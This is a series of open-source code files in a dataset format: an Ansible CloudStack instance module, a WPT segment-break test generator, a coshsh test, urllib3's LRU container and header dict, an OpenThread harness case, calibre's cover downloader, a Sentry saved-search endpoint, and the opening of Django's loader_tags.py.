            res = {}
            if instance['state'].lower() in [ 'destroying', 'destroyed' ]:
                self.result['changed'] = True
                if not self.module.check_mode:
                    res = self.cs.destroyVirtualMachine(id=instance['id'], expunge=True)

            elif instance['state'].lower() not in [ 'expunging' ]:
                self.result['changed'] = True
                if not self.module.check_mode:
                    res = self.cs.destroyVirtualMachine(id=instance['id'], expunge=True)

            if res and 'errortext' in res:
                self.module.fail_json(msg="Failed: '%s'" % res['errortext'])

            poll_async = self.module.params.get('poll_async')
            if poll_async:
                res = self.poll_job(res, 'virtualmachine')
        return instance

    def stop_instance(self):
        """Stop the VM if it is starting/running; no-op when already stopped."""
        instance = self.get_instance()
        # in check mode instance may not be instantiated
        if instance:
            if instance['state'].lower() in ['stopping', 'stopped']:
                return instance

            if instance['state'].lower() in ['starting', 'running']:
                self.result['changed'] = True
                if not self.module.check_mode:
                    instance = self.cs.stopVirtualMachine(id=instance['id'])

                    if 'errortext' in instance:
                        self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])

                    poll_async = self.module.params.get('poll_async')
                    if poll_async:
                        instance = self.poll_job(instance, 'virtualmachine')
        return instance

    def start_instance(self):
        """Start the VM if it is stopped/stopping; no-op when already running."""
        instance = self.get_instance()
        # in check mode instance may not be instantiated
        if instance:
            if instance['state'].lower() in ['starting', 'running']:
                return instance

            if instance['state'].lower() in ['stopped', 'stopping']:
                self.result['changed'] = True
                if not self.module.check_mode:
                    instance = self.cs.startVirtualMachine(id=instance['id'])

                    if 'errortext' in instance:
                        self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])

                    poll_async = self.module.params.get('poll_async')
                    if poll_async:
                        instance = self.poll_job(instance, 'virtualmachine')
        return instance

    def restart_instance(self):
        """Reboot a running VM; a stopped VM is simply started."""
        instance = self.get_instance()
        # in check mode instance may not be instantiated
        if instance:
            if instance['state'].lower() in [ 'running', 'starting' ]:
                self.result['changed'] = True
                if not self.module.check_mode:
                    instance = self.cs.rebootVirtualMachine(id=instance['id'])

                    if 'errortext' in instance:
                        self.module.fail_json(msg="Failed: '%s'" % instance['errortext'])

                    poll_async = self.module.params.get('poll_async')
                    if poll_async:
                        instance = self.poll_job(instance, 'virtualmachine')

            elif instance['state'].lower() in [ 'stopping', 'stopped' ]:
                instance = self.start_instance()
        return instance

    def restore_instance(self):
        """Reinstall the VM from its (or the given) template/ISO."""
        instance = self.get_instance()
        self.result['changed'] = True
        # in check mode instance may not be instantiated
        if instance:
            args = {}
            args['templateid'] = self.get_template_or_iso(key='id')
            args['virtualmachineid'] = instance['id']
            res = self.cs.restoreVirtualMachine(**args)
            if 'errortext' in res:
                self.module.fail_json(msg="Failed: '%s'" % res['errortext'])

            poll_async = self.module.params.get('poll_async')
            if poll_async:
                instance = self.poll_job(res, 'virtualmachine')
        return instance

    def get_result(self, instance):
        """Extend the base result with security/affinity groups and default IP."""
        super(AnsibleCloudStackInstance, self).get_result(instance)
        if instance:
            if 'securitygroup' in instance:
                security_groups = []
                for securitygroup in instance['securitygroup']:
                    security_groups.append(securitygroup['name'])
                self.result['security_groups'] = security_groups
            if 'affinitygroup' in instance:
                affinity_groups = []
                for affinitygroup in instance['affinitygroup']:
                    affinity_groups.append(affinitygroup['name'])
                self.result['affinity_groups'] = affinity_groups
            if 'nic' in instance:
                for nic in instance['nic']:
                    if nic['isdefault'] and 'ipaddress' in nic:
                        self.result['default_ip'] = nic['ipaddress']
        return self.result
def main():
    """Module entry point.

    Builds the argument spec, validates mutually-exclusive/required
    options via AnsibleModule, then dispatches on ``state``.
    """
    argument_spec = cs_argument_spec()
    argument_spec.update(dict(
        name = dict(default=None),
        display_name = dict(default=None),
        group = dict(default=None),
        state = dict(choices=['present', 'deployed', 'started', 'stopped', 'restarted', 'restored', 'absent', 'destroyed', 'expunged'], default='present'),
        service_offering = dict(default=None),
        cpu = dict(default=None, type='int'),
        cpu_speed = dict(default=None, type='int'),
        memory = dict(default=None, type='int'),
        template = dict(default=None),
        iso = dict(default=None),
        template_filter = dict(default="executable", aliases=['iso_filter'], choices=['featured', 'self', 'selfexecutable', 'sharedexecutable', 'executable', 'community']),
        networks = dict(type='list', aliases=[ 'network' ], default=None),
        ip_to_networks = dict(type='list', aliases=['ip_to_network'], default=None),
        # Fixed typo: these two options previously used the unknown spec key
        # 'defaul', so the intended default=None was never declared explicitly.
        ip_address = dict(default=None),
        ip6_address = dict(default=None),
        disk_offering = dict(default=None),
        disk_size = dict(type='int', default=None),
        root_disk_size = dict(type='int', default=None),
        keyboard = dict(choices=['de', 'de-ch', 'es', 'fi', 'fr', 'fr-be', 'fr-ch', 'is', 'it', 'jp', 'nl-be', 'no', 'pt', 'uk', 'us'], default=None),
        hypervisor = dict(choices=CS_HYPERVISORS, default=None),
        security_groups = dict(type='list', aliases=[ 'security_group' ], default=None),
        affinity_groups = dict(type='list', aliases=[ 'affinity_group' ], default=[]),
        domain = dict(default=None),
        account = dict(default=None),
        project = dict(default=None),
        user_data = dict(default=None),
        zone = dict(default=None),
        ssh_key = dict(default=None),
        force = dict(type='bool', default=False),
        tags = dict(type='list', aliases=[ 'tag' ], default=None),
        vpc = dict(default=None),
        poll_async = dict(type='bool', default=True),
    ))

    # Custom service offerings need all three sizing values together.
    required_together = cs_required_together()
    required_together.extend([
        ['cpu', 'cpu_speed', 'memory'],
    ])

    module = AnsibleModule(
        argument_spec=argument_spec,
        required_together=required_together,
        required_one_of = (
            ['display_name', 'name'],
        ),
        mutually_exclusive = (
            ['template', 'iso'],
        ),
        supports_check_mode=True
    )

    try:
        acs_instance = AnsibleCloudStackInstance(module)

        state = module.params.get('state')

        if state in ['absent', 'destroyed']:
            instance = acs_instance.absent_instance()

        elif state in ['expunged']:
            instance = acs_instance.expunge_instance()

        elif state in ['restored']:
            acs_instance.present_instance()
            instance = acs_instance.restore_instance()

        elif state in ['present', 'deployed']:
            instance = acs_instance.present_instance()

        elif state in ['stopped']:
            # Ensure the instance exists but do not boot it.
            acs_instance.present_instance(start_vm=False)
            instance = acs_instance.stop_instance()

        elif state in ['started']:
            acs_instance.present_instance()
            instance = acs_instance.start_instance()

        elif state in ['restarted']:
            acs_instance.present_instance()
            instance = acs_instance.restart_instance()

        if instance and 'state' in instance and instance['state'].lower() == 'error':
            module.fail_json(msg="Instance named '%s' in error state." % module.params.get('name'))

        result = acs_instance.get_result(instance)

    except CloudStackException as e:
        module.fail_json(msg='CloudStackException: %s' % str(e))

    module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
# Execute the module when run directly by Ansible.
if __name__ == '__main__':
    main()
|
gpl-3.0
|
alon/servo
|
tests/wpt/css-tests/css-text-3_dev/xhtml1print/support/generate-segment-break-transformation-rules-tests.py
|
324
|
4862
|
#!/usr/bin/env python
# - * - coding: UTF-8 - * -
"""
This script generates tests segment-break-transformation-rules-001 ~ 049 which
cover all possible combinations of characters at two sides of segment breaks.
More specifically, there are seven types of characters involve in these rules:
1. East Asian Full-width (F)
2. East Asian Half-width (H)
3. East Asian Wide (W) except Hangul
4. East Asian Narrow (Na)
5. East Asian Ambiguous (A)
6. Not East Asian (Neutral)
7. Hangul
So there are 49 different combinations. It outputs a list of all
tests it generated in the format of Mozilla reftest.list to the stdout.
"""
from __future__ import unicode_literals
# Filename patterns for generated test and reference pages (zero-padded index).
TEST_FILE = 'segment-break-transformation-rules-{:03}.html'

# Test page: two sample strings separated by a literal segment break inside <p>.
# NOTE(review): the 'semgment' typo below is part of the emitted runtime string;
# fixing it here would change every generated test file.
TEST_TEMPLATE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reftest Test: Segment Break Transformation Rules</title>
<link rel="author" title="Chun-Min (Jeremy) Chen" href="mailto:[email protected]">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="help" href="https://drafts.csswg.org/css-text-3/#line-break-transform">
<meta name="assert" content="'segment-break-transformation-rules: with {prev}/{next} in front/back of the semgment break.">
<link rel="stylesheet" type="text/css" href="support/ahem.css" />
<link rel="match" href="segment-break-transformation-rules-{index:03}-ref.html">
<style> p {{ font-family: ahem; }} </style>
<div>Pass if there is {expect} white space between the two strings below.
<p>{prevchar}
{nextchar}</p>
</div>
'''

REF_FILE = 'segment-break-transformation-rules-{:03}-ref.html'

# Reference page for the "segment break removed" expectation: no space.
REF_TEMPLATE_REMOVE = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reftest Reference: Segment Break Transformation Rules</title>
<link rel="author" title="Chun-Min (Jeremy) Chen" href="mailto:[email protected]">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="stylesheet" type="text/css" href="support/ahem.css" />
<style> p {{ font-family: ahem; }} </style>
<div>Pass if there is NO white space between the two strings below.
<p>{0}{1}</p>
</div>
'''

# Reference page for the "segment break converted to a space" expectation.
REF_TEMPLATE_KEEP = '''<!DOCTYPE html>
<meta charset="utf-8">
<title>CSS Reftest Reference: Segment Break Transformation Rules</title>
<link rel="author" title="Chun-Min (Jeremy) Chen" href="mailto:[email protected]">
<link rel="author" title="Mozilla" href="https://www.mozilla.org">
<link rel="stylesheet" type="text/css" href="support/ahem.css" />
<style> p {{ font-family: ahem; }} </style>
<div>Pass if there is ONE white space between the two strings below.
<p>{0}{2}{1}</p>
</div>
'''

# (category label, sample string) per East Asian Width class; the first three
# entries are the F/H/W classes that allow segment-break removal.
# NOTE(review): the F and H sample strings appear ASCII/width-normalized in
# this copy; originally they should use fullwidth/halfwidth forms — verify
# against the upstream file before regenerating tests.
CHAR_SET = [
    ('East Asian Full-width (F)', 'FULLWIDTH'),
    ('East Asian Half-width (H)', 'テスト'),
    ('East Asian Wide (W) except Hangul', '測試'),
    ('East Asian Narrow (Na)', 'narrow'),
    ('East Asian Ambiguous (A)', '■'),
    ('Not East Asian (Neutral)', 'آزمون'),
    ('Hangul', '테스트'),
]
def write_file(filename, content):
    """Write *content* to *filename* as UTF-8 encoded bytes."""
    encoded = content.encode('UTF-8')
    out = open(filename, 'wb')
    try:
        out.write(encoded)
    finally:
        out.close()
# Emit the reftest manifest header, then generate one test/reference pair for
# every ordered combination of the seven character classes (7 x 7 = 49 tests).
print("# START tests from {}".format(__file__))
# NOTE(review): 'global' at module scope is a no-op; idx is already global.
global idx
idx = 0
for i, (prevtype, prevchars) in enumerate(CHAR_SET):
    for j, (nextype, nextchars) in enumerate(CHAR_SET):
        idx += 1
        reffilename = REF_FILE.format(idx)
        testfilename = TEST_FILE.format(idx)
        # According to CSS Text 3 - 4.1.2. Segment Break Transformation Rules,
        # if the East Asian Width property of both the character before and
        # after the segment break is F, W, or H (not A), and neither side is
        # Hangul, then the segment break is removed. Otherwise, the segment
        # break is converted to a space (U+0020).
        # The first three CHAR_SET entries are exactly the F/H/W classes,
        # hence the i < 3 and j < 3 test.
        if i < 3 and j < 3:
            write_file(reffilename,
                       REF_TEMPLATE_REMOVE.format(prevchars, nextchars))
            write_file(testfilename,
                       TEST_TEMPLATE.format(index=idx, prev=prevtype,
                                            next=nextype,
                                            prevchar=prevchars,
                                            nextchar=nextchars,
                                            expect='NO'))
        else:
            write_file(reffilename,
                       REF_TEMPLATE_KEEP.format(prevchars, nextchars, ' '))
            write_file(testfilename,
                       TEST_TEMPLATE.format(index=idx, prev=prevtype,
                                            next=nextype,
                                            prevchar=prevchars,
                                            nextchar=nextchars,
                                            expect='ONE'))
        # One manifest line per generated pair, in Mozilla reftest.list format.
        print("== {} {}".format(testfilename, reffilename))
print("# END tests from {}".format(__file__))
|
mpl-2.0
|
lausser/coshsh
|
tests/test_application_mysql.py
|
1
|
3116
|
import unittest
import sys
import os
import logging
sys.dont_write_bytecode = True
sys.path.insert(0, os.path.abspath(".."))
#sys.path.insert(0, os.path.abspath(os.path.join("..", "coshsh")))
import coshsh
from coshsh.generator import Generator
#from datasource import Datasource
from coshsh.host import Host
from coshsh.application import Application
from coshsh.monitoringdetail import MonitoringDetail
from coshsh.util import setup_logging
logger = logging.getLogger('coshsh')
class CoshshTest(unittest.TestCase):
    """Tests for a mysql application attached to a host (test10 recipe)."""

    def setUp(self):
        # Fresh generator and empty host/application registries per test.
        self.generator = Generator()
        setup_logging()
        self.hosts = {}
        self.applications = {}
        # Load application and monitoring-detail classes from the default
        # and test10 recipe class directories.
        coshsh.application.Application.init_classes([
            os.path.join(os.path.dirname(__file__), '../recipes/default/classes'),
            os.path.join(os.path.dirname(__file__), 'recipes/test10/classes')])
        MonitoringDetail.init_classes([
            os.path.join(os.path.dirname(__file__), '../recipes/default/classes'),
            os.path.join(os.path.dirname(__file__), 'recipes/test10/classes')])
        pass  # NOTE(review): leftover no-op
        # Build a Host from a CSV-like row; empty strings become None.
        row = ['drivelsrv', '11.120.9.10', 'Server', 'Red Hat 6.0', '', 'vs', '7x24', '2nd floor', 'ps']
        final_row = { }
        for (index, value) in enumerate(['host_name', 'address', 'type', 'os', 'hardware', 'virtual', 'notification_period', 'location', 'department']):
            final_row[value] = [None if row[index] == "" else row[index]][0]
        h = coshsh.host.Host(final_row)
        self.hosts[h.host_name] = h
        # Build a mysql Application bound to that host.
        row = ['drivel', 'mysql', '', '', '', 'drivelsrv', '7x24']
        final_row = { }
        for (index, value) in enumerate(['name', 'type', 'component', 'version', 'patchlevel', 'host_name', 'check_period']):
            final_row[value] = [None if row[index] == "" else row[index]][0]
        a = coshsh.application.Application(final_row)
        #a.__init__(final_row)
        self.applications[a.fingerprint()] = a
        setattr(a, "host", self.hosts[a.host_name])

    def test_create_server(self):
        # The mysql application class provides a default port of 3306.
        self.assert_("drivelsrv" in self.hosts)
        h = self.hosts["drivelsrv"]
        a = self.applications["drivelsrv+drivel+mysql"]
        self.assert_(hasattr(h, 'host_name'))
        self.assert_(h.host_name == 'drivelsrv')
        self.assert_(hasattr(a, 'host_name'))
        self.assert_(a.host_name == 'drivelsrv')
        self.assert_(hasattr(a, "port"))
        self.assert_(a.port == 3306)

    def test_create_server_alternative_port(self):
        # A PORT monitoring detail overrides the default mysql port.
        self.assert_("drivelsrv" in self.hosts)
        h = self.hosts["drivelsrv"]
        a = self.applications["drivelsrv+drivel+mysql"]
        self.assert_(hasattr(h, 'host_name'))
        self.assert_(h.host_name == 'drivelsrv')
        self.assert_(hasattr(a, 'host_name'))
        self.assert_(a.host_name == 'drivelsrv')
        a.monitoring_details.append(coshsh.monitoringdetail.MonitoringDetail({
            "monitoring_type" : "PORT",
            "monitoring_0" : 10000}))
        a.resolve_monitoring_details()
        self.assert_(a.port == 10000)
# Allow running this test file directly.
if __name__ == '__main__':
    unittest.main()
|
agpl-3.0
|
danielvdao/facebookMacBot
|
venv/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/_collections.py
|
327
|
6557
|
# urllib3/_collections.py
# Copyright 2008-2013 Andrey Petrov and contributors (see CONTRIBUTORS.txt)
#
# This module is part of urllib3 and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from collections import Mapping, MutableMapping
try:
    from threading import RLock
except ImportError:  # Platform-specific: No threads available
    class RLock:
        # No-op context-manager stand-in used when the platform has no
        # threading support; locking is then unnecessary.
        def __enter__(self):
            pass

        def __exit__(self, exc_type, exc_value, traceback):
            pass
try: # Python 2.7+
from collections import OrderedDict
except ImportError:
from .packages.ordered_dict import OrderedDict
from .packages.six import itervalues
__all__ = ['RecentlyUsedContainer', 'HTTPHeaderDict']
_Null = object()
class RecentlyUsedContainer(MutableMapping):
    """
    Provides a thread-safe dict-like container which maintains up to
    ``maxsize`` keys while throwing away the least-recently-used keys beyond
    ``maxsize``.

    :param maxsize:
        Maximum number of recent elements to retain.

    :param dispose_func:
        Callback invoked as ``dispose_func(value)`` every time an item is
        evicted from the container.
    """

    ContainerCls = OrderedDict

    def __init__(self, maxsize=10, dispose_func=None):
        self._maxsize = maxsize
        self.dispose_func = dispose_func
        # OrderedDict insertion order doubles as recency order: the least
        # recently used entry sits at the front (popitem(last=False)).
        self._container = self.ContainerCls()
        self.lock = RLock()

    def __getitem__(self, key):
        # Re-insert the item, moving it to the end of the eviction line.
        with self.lock:
            item = self._container.pop(key)
            self._container[key] = item
            return item

    def __setitem__(self, key, value):
        evicted_value = _Null
        with self.lock:
            # Possibly evict the existing value of 'key'
            evicted_value = self._container.get(key, _Null)
            self._container[key] = value

            # If we didn't evict an existing value, we might have to evict the
            # least recently used item from the beginning of the container.
            if len(self._container) > self._maxsize:
                _key, evicted_value = self._container.popitem(last=False)

        # Dispose callback runs outside the lock so user code cannot
        # deadlock or block other container operations.
        if self.dispose_func and evicted_value is not _Null:
            self.dispose_func(evicted_value)

    def __delitem__(self, key):
        with self.lock:
            value = self._container.pop(key)

        # Dispose outside the lock (see __setitem__).
        if self.dispose_func:
            self.dispose_func(value)

    def __len__(self):
        with self.lock:
            return len(self._container)

    def __iter__(self):
        raise NotImplementedError('Iteration over this class is unlikely to be threadsafe.')

    def clear(self):
        with self.lock:
            # Copy pointers to all values, then wipe the mapping
            # under Python 2, this copies the list of values twice :-|
            values = list(self._container.values())
            self._container.clear()

        if self.dispose_func:
            for value in values:
                self.dispose_func(value)

    def keys(self):
        with self.lock:
            return self._container.keys()
class HTTPHeaderDict(MutableMapping):
"""
:param headers:
An iterable of field-value pairs. Must not contain multiple field names
when compared case-insensitively.
:param kwargs:
Additional field-value pairs to pass in to ``dict.update``.
A ``dict`` like container for storing HTTP Headers.
Field names are stored and compared case-insensitively in compliance with
RFC 2616. Iteration provides the first case-sensitive key seen for each
case-insensitive pair.
Using ``__setitem__`` syntax overwrites fields that compare equal
case-insensitively in order to maintain ``dict``'s api. For fields that
compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add``
in a loop.
If multiple fields that are equal case-insensitively are passed to the
constructor or ``.update``, the behavior is undefined and some will be
lost.
>>> headers = HTTPHeaderDict()
>>> headers.add('Set-Cookie', 'foo=bar')
>>> headers.add('set-cookie', 'baz=quxx')
>>> headers['content-length'] = '7'
>>> headers['SET-cookie']
'foo=bar, baz=quxx'
>>> headers['Content-Length']
'7'
If you want to access the raw headers with their original casing
for debugging purposes you can access the private ``._data`` attribute
which is a normal python ``dict`` that maps the case-insensitive key to a
list of tuples stored as (case-sensitive-original-name, value). Using the
structure from above as our example:
>>> headers._data
{'set-cookie': [('Set-Cookie', 'foo=bar'), ('set-cookie', 'baz=quxx')],
'content-length': [('content-length', '7')]}
"""
def __init__(self, headers=None, **kwargs):
self._data = {}
if headers is None:
headers = {}
self.update(headers, **kwargs)
def add(self, key, value):
"""Adds a (name, value) pair, doesn't overwrite the value if it already
exists.
>>> headers = HTTPHeaderDict(foo='bar')
>>> headers.add('Foo', 'baz')
>>> headers['foo']
'bar, baz'
"""
self._data.setdefault(key.lower(), []).append((key, value))
def getlist(self, key):
"""Returns a list of all the values for the named field. Returns an
empty list if the key doesn't exist."""
return self[key].split(', ') if key in self else []
def copy(self):
h = HTTPHeaderDict()
for key in self._data:
for rawkey, value in self._data[key]:
h.add(rawkey, value)
return h
def __eq__(self, other):
if not isinstance(other, Mapping):
return False
other = HTTPHeaderDict(other)
return dict((k1, self[k1]) for k1 in self._data) == \
dict((k2, other[k2]) for k2 in other._data)
def __getitem__(self, key):
values = self._data[key.lower()]
return ', '.join(value[1] for value in values)
def __setitem__(self, key, value):
self._data[key.lower()] = [(key, value)]
def __delitem__(self, key):
del self._data[key.lower()]
    def __len__(self):
        # Number of distinct (case-insensitive) header names, not value count.
        return len(self._data)
def __iter__(self):
for headers in itervalues(self._data):
yield headers[0][0]
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, dict(self.items()))
|
mit
|
jwhui/openthread
|
tools/harness-automation/cases/leader_5_6_6.py
|
18
|
1877
|
#!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import unittest
from autothreadharness.harness_case import HarnessCase
class Leader_5_6_6(HarnessCase):
    """Harness automation wrapper for certification case 5.6.6, leader role."""
    role = HarnessCase.ROLE_LEADER
    case = '5 6 6'
    golden_devices_required = 3
    def on_dialog(self, dialog, title):
        # No dialog interaction is required for this case.
        pass
# Allow running this single case directly from the command line.
if __name__ == '__main__':
    unittest.main()
|
bsd-3-clause
|
drxaero/calibre
|
src/calibre/ebooks/metadata/sources/covers.py
|
13
|
5969
|
#!/usr/bin/env python2
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2011, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import time
from Queue import Queue, Empty
from threading import Thread, Event
from io import BytesIO
from calibre.customize.ui import metadata_plugins
from calibre.ebooks.metadata.sources.base import create_log
from calibre.ebooks.metadata.sources.prefs import msprefs
from calibre.utils.magick.draw import Image, save_cover_data_to
class Worker(Thread):
    """Daemon thread that asks one metadata-source plugin to download covers.
    The plugin pushes results onto the shared queue ``rq``; all log output is
    buffered in ``self.buf`` so the caller can report it per plugin later.
    """
    def __init__(self, plugin, abort, title, authors, identifiers, timeout, rq, get_best_cover=False):
        Thread.__init__(self)
        self.daemon = True
        self.plugin = plugin
        self.abort = abort
        self.get_best_cover = get_best_cover
        # Per-worker log buffer; read via buf.getvalue() after the run.
        self.buf = BytesIO()
        self.log = create_log(self.buf)
        self.title, self.authors, self.identifiers = (title, authors,
                identifiers)
        self.timeout, self.rq = timeout, rq
        # None until run() finishes; used by callers to detect aborted downloads.
        self.time_spent = None
    def run(self):
        start_time = time.time()
        if not self.abort.is_set():
            try:
                # Some plugins can return several covers and accept
                # get_best_cover; older ones take fewer keyword args.
                if self.plugin.can_get_multiple_covers:
                    self.plugin.download_cover(self.log, self.rq, self.abort,
                            title=self.title, authors=self.authors, get_best_cover=self.get_best_cover,
                            identifiers=self.identifiers, timeout=self.timeout)
                else:
                    self.plugin.download_cover(self.log, self.rq, self.abort,
                            title=self.title, authors=self.authors,
                            identifiers=self.identifiers, timeout=self.timeout)
            except:
                # Plugin failures are logged, never propagated to the caller.
                self.log.exception('Failed to download cover from',
                        self.plugin.name)
        self.time_spent = time.time() - start_time
def is_worker_alive(workers):
    """Return True if any thread in *workers* is still running.

    :param workers: iterable of threading.Thread-like objects
    """
    # any() short-circuits exactly like the original explicit loop did.
    return any(w.is_alive() for w in workers)
def process_result(log, result):
    """Validate a downloaded cover and normalize it to JPEG.

    *result* is a (plugin, raw_bytes) tuple; returns
    (plugin, width, height, fmt, jpeg_bytes), or None when the image cannot
    be loaded or is smaller than 50x50.
    """
    plugin, data = result
    try:
        im = Image()
        im.load(data)
        if getattr(plugin, 'auto_trim_covers', False):
            im.trim(10)
        width, height = im.size
        fmt = im.format
        if width < 50 or height < 50:
            raise ValueError('Image too small')
        data = save_cover_data_to(im, '/cover.jpg', return_data=True)
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit; narrowed to Exception while keeping best-effort behavior.
        log.exception('Invalid cover from', plugin.name)
        return None
    return (plugin, width, height, fmt, data)
def run_download(log, results, abort,
        title=None, authors=None, identifiers={}, timeout=30, get_best_cover=False):
    '''
    Run the cover download, putting results into the queue :param:`results`.
    Each result is a tuple of the form:
        (plugin, width, height, fmt, bytes)
    '''
    # NOTE: identifiers={} is a mutable default; it is never mutated here, so
    # the signature is kept for backward compatibility.
    if title == _('Unknown'):
        title = None
    if authors == [_('Unknown')]:
        authors = None
    plugins = [p for p in metadata_plugins(['cover']) if p.is_configured()]
    rq = Queue()
    workers = [Worker(p, abort, title, authors, identifiers, timeout, rq, get_best_cover=get_best_cover) for p
            in plugins]
    for w in workers:
        w.start()
    first_result_at = None
    wait_time = msprefs['wait_after_first_cover_result']
    found_results = {}
    start_time = time.time()  # Use a global timeout to workaround misbehaving plugins that hang
    while time.time() - start_time < 301:
        time.sleep(0.1)
        try:
            x = rq.get_nowait()
            result = process_result(log, x)
            if result is not None:
                results.put(result)
                found_results[result[0]] = result
                # BUG FIX: this previously read ``is not None``, so the time
                # of the *first* result was never recorded and the
                # wait_after_first_cover_result preference had no effect.
                if first_result_at is None:
                    first_result_at = time.time()
        except Empty:
            pass
        if not is_worker_alive(workers):
            break
        if first_result_at is not None and time.time() - first_result_at > wait_time:
            log('Not waiting for any more results')
            abort.set()
        if abort.is_set():
            break
    # Drain any results that arrived after the loop exited.
    while True:
        try:
            x = rq.get_nowait()
            result = process_result(log, x)
            if result is not None:
                results.put(result)
                found_results[result[0]] = result
        except Empty:
            break
    # Report per-plugin outcome and buffered log output.
    for w in workers:
        wlog = w.buf.getvalue().strip()
        log('\n'+'*'*30, w.plugin.name, 'Covers', '*'*30)
        log('Request extra headers:', w.plugin.browser.addheaders)
        if w.plugin in found_results:
            result = found_results[w.plugin]
            log('Downloaded cover:', '%dx%d'%(result[1], result[2]))
        else:
            log('Failed to download valid cover')
        if w.time_spent is None:
            log('Download aborted')
        else:
            log('Took', w.time_spent, 'seconds')
        if wlog:
            log(wlog)
        log('\n'+'*'*80)
def download_cover(log,
        title=None, authors=None, identifiers={}, timeout=30):
    '''
    Synchronous cover download. Returns the "best" cover as per user
    prefs/cover resolution.
    Returned cover is a tuple: (plugin, width, height, fmt, data)
    Returns None if no cover is found.
    '''
    rq = Queue()
    abort = Event()
    run_download(log, rq, abort, title=title, authors=authors,
            identifiers=identifiers, timeout=timeout, get_best_cover=True)
    results = []
    while True:
        try:
            results.append(rq.get_nowait())
        except Empty:
            break
    cp = msprefs['cover_priorities']
    # Sort by user-configured plugin priority, then prefer larger covers:
    # 1/(width*height) shrinks as the area grows (true division is enabled
    # via the __future__ import at the top of this file).
    def keygen(result):
        plugin, width, height, fmt, data = result
        return (cp.get(plugin.name, 1), 1/(width*height))
    results.sort(key=keygen)
    return results[0] if results else None
|
gpl-3.0
|
hongliang5623/sentry
|
src/sentry/api/endpoints/project_search_details.py
|
23
|
2463
|
from __future__ import absolute_import
from rest_framework import serializers
from rest_framework.response import Response
from sentry.api.bases.project import ProjectEndpoint
from sentry.api.exceptions import ResourceDoesNotExist
from sentry.api.serializers import serialize
from sentry.models import SavedSearch
class SavedSearchSerializer(serializers.Serializer):
    # Validates saved-search payloads; both fields are required on full
    # validation, but the PUT endpoint passes partial=True.
    name = serializers.CharField(max_length=128, required=True)
    query = serializers.CharField(required=True)
class ProjectSearchDetailsEndpoint(ProjectEndpoint):
    """CRUD endpoint for a single project-scoped SavedSearch."""
    def get(self, request, project, search_id):
        """
        Retrieve a saved search
        Return details on an individual saved search.
        {method} {path}
        """
        try:
            search = SavedSearch.objects.get(
                project=project,
                id=search_id,
            )
        except SavedSearch.DoesNotExist:
            raise ResourceDoesNotExist
        return Response(serialize(search, request.user))
    def put(self, request, project, search_id):
        """
        Update a saved search
        Update the name and/or query of a saved search.
        {method} {path}
        {{
            "name": "Unresolved",
            "query": "is:unresolved"
        }}
        """
        try:
            search = SavedSearch.objects.get(
                project=project,
                id=search_id,
            )
        except SavedSearch.DoesNotExist:
            raise ResourceDoesNotExist
        serializer = SavedSearchSerializer(data=request.DATA, partial=True)
        if not serializer.is_valid():
            return Response(serializer.errors, status=400)
        result = serializer.object
        kwargs = {}
        if result.get('name'):
            kwargs['name'] = result['name']
        # BUG FIX: this previously read ``result.get('text')``, but the
        # serializer declares a ``query`` field, so ``text`` could never be
        # present and query updates were silently dropped.
        if result.get('query'):
            kwargs['query'] = result['query']
        if kwargs:
            search.update(**kwargs)
        return Response(serialize(search, request.user))
    def delete(self, request, project, search_id):
        """
        Delete a saved search
        Permanently remove a saved search.
        {method} {path}
        """
        try:
            search = SavedSearch.objects.get(
                project=project,
                id=search_id,
            )
        except SavedSearch.DoesNotExist:
            raise ResourceDoesNotExist
        search.delete()
        return Response(status=204)
|
bsd-3-clause
|
abhattad4/Digi-Menu
|
django/template/loader_tags.py
|
100
|
9868
|
from collections import defaultdict
from django.template.base import (
Library, Node, Template, TemplateSyntaxError, TextNode, Variable,
token_kwargs,
)
from django.utils import six
from django.utils.safestring import mark_safe
register = Library()
BLOCK_CONTEXT_KEY = 'block_context'
class ExtendsError(Exception):
pass
class BlockContext(object):
    """Per-render registry of {% block %} nodes, keyed by block name."""
    def __init__(self):
        # Each name maps to a list used as a FIFO queue of BlockNodes.
        self.blocks = defaultdict(list)
    def add_blocks(self, blocks):
